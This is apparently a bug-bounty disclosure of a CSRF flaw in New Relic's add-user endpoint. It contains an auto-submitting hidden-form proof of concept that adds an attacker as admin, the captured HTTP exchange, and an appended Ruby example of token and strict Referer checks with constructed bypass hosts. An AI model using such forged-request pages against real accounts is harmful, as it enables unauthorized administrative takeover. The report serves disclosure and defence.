New Relic: CSRF For Adding Users

ID H1:225326
Type hackerone
Reporter atestpk
Modified 2017-10-11T22:54:42


Issue: The affected API is {{accountid}}/account_views (the POST to /accounts/1621740/account_views in the request below).

Only admin users are allowed to add new users, but a normal user who knows the accountid can craft a web page that performs a CSRF when an admin user visits it.

Two problems combine to make the CSRF possible:
1. No check for the authenticity_token (the Rails CSRF token) on the request.
2. There is a Referer header check, but it is flawed; the Referer value used in the request below will bypass it.

PoC (replace accountid, and host the page on a URL that contains the string that bypasses the Referer check):

```html
<html>
<!-- hidden iframe: the response lands here instead of replacing the attacker's page -->
<iframe style="width:0;height:0;border:0; border:none;" name="csrf-frame"></iframe>

<!-- action is the account_views URL for the target accountid (elided in the report) -->
<form name="adduser" action="" method="post" target="csrf-frame">
  <input type="submit">
  <input type="hidden" name="utf8" value="✓">
  <input type="hidden" name="id" value="accountid">
  <!-- the attacker's e-mail address (elided in the report) -->
  <input type="hidden" name="account_view[user][email]" value="">
  <input type="hidden" name="account_view[user][full_name]" value="attacker">
  <input type="hidden" name="account_view[level]" value="admin">
  <input type="hidden" name="account_view[user][job_title]" value="">
</form>

<!-- auto-submit on load; no authenticity_token field is needed -->
<script> document.forms.adduser.submit(); </script>
</html>
```

An admin who visits this page will add the address given in account_view[user][email] as an admin on the account.

CSRF request and response:

```http
POST /accounts/1621740/account_views HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Referer: [.......]


HTTP/1.1 302 Found
Server: nginx
Date: Mon, 01 May 2017 15:48:12 GMT
Content-Type: text/html; charset=utf-8
Connection: Keep-Alive
Status: 302 Found
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Location: [.....]

<html><body>You are being <a href="">redirected</a>.</body></html>
```

The POST request above is successful, as shown by the 302 redirect to the Location given in the response. Note that the X-Frame-Options: DENY header on the response does not help here: it only stops the response from being rendered in the hidden iframe, after the browser has already sent the cross-site POST with the admin's session cookie.

Mitigation
* Verify the CSRF token (authenticity_token) on the request; this is the primary defence.
* Check that the Referer URL starts with the application's own origin (or another whitelisted domain). A plain prefix or substring match is not enough: compare the parsed scheme and host exactly, otherwise a host chosen to begin with or contain the trusted name still passes.
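The two mitigations, next to a prefix-style Referer check of the kind the report says is flawed, as an added Ruby example that is neither New Relic's code nor the reporter's. TRUSTED_ORIGIN is an assumed placeholder origin, the attacker hosts are constructed, and the prefix-match bypass is a generic illustration, since the report does not reproduce the actual bypass string. The example goes beyond the page by showing a userinfo-style bypass as well.

```ruby
require "uri"

# Assumed placeholder for the application's origin (not New Relic's real one).
TRUSTED_ORIGIN = "https://app.example.com"

# Flawed check: a plain prefix match on the Referer. Any attacker-controlled
# URL whose text begins with the trusted origin passes.
def referer_allowed_naive?(referer)
  !referer.nil? && referer.start_with?(TRUSTED_ORIGIN)
end

# Stricter check: parse the Referer and compare scheme, host and port exactly
# with the trusted origin. A missing or unparseable Referer is rejected, since a
# state-changing request sent by the real UI always carries one.
def referer_allowed_strict?(referer)
  return false if referer.nil? || referer.empty?
  ref = URI.parse(referer)
  trusted = URI.parse(TRUSTED_ORIGIN)
  ref.scheme == trusted.scheme && ref.host == trusted.host && ref.port == trusted.port
rescue URI::InvalidURIError
  false
end

# Constant-time string comparison, so the token check does not leak timing.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# Primary defence: the submitted authenticity_token must match the token bound
# to the admin's session. The PoC form carries no token at all, so it fails here.
def authenticity_token_valid?(session_token, submitted_token)
  return false if session_token.nil? || submitted_token.nil?
  secure_equal?(session_token, submitted_token)
end

# Gate for the add-user action: both checks must pass. Inputs are plain hashes
# standing in for Rails params, request headers and the session.
def authorize_add_user?(params, headers, session)
  authenticity_token_valid?(session[:csrf_token], params["authenticity_token"]) &&
    referer_allowed_strict?(headers["Referer"])
end

# Constructed sample requests: the PoC-style cross-site POST and a genuine one.
CSRF_REQUEST = {
  params: { "account_view[level]" => "admin" },            # no authenticity_token
  headers: { "Referer" => "https://app.example.com.evil.net/csrf.html" }
}
GENUINE_REQUEST = {
  params: { "authenticity_token" => "s3ss10n-t0k3n", "account_view[level]" => "admin" },
  headers: { "Referer" => "https://app.example.com/accounts/1621740/account_views/new" }
}
SESSION = { csrf_token: "s3ss10n-t0k3n" }

if __FILE__ == $PROGRAM_NAME
  puts "naive referer check passes attacker page: #{referer_allowed_naive?(CSRF_REQUEST[:headers]['Referer'])}"
  puts "CSRF request authorized: #{authorize_add_user?(CSRF_REQUEST[:params], CSRF_REQUEST[:headers], SESSION)}"
  puts "genuine request authorized: #{authorize_add_user?(GENUINE_REQUEST[:params], GENUINE_REQUEST[:headers], SESSION)}"
end
```

The naive check accepts both `https://app.example.com.evil.net/` and `https://app.example.com@evil.net/` (the part before `@` is userinfo, so the real host is evil.net), while the parsed comparison rejects both; the token check alone already blocks the PoC, and the Referer check is only a second layer.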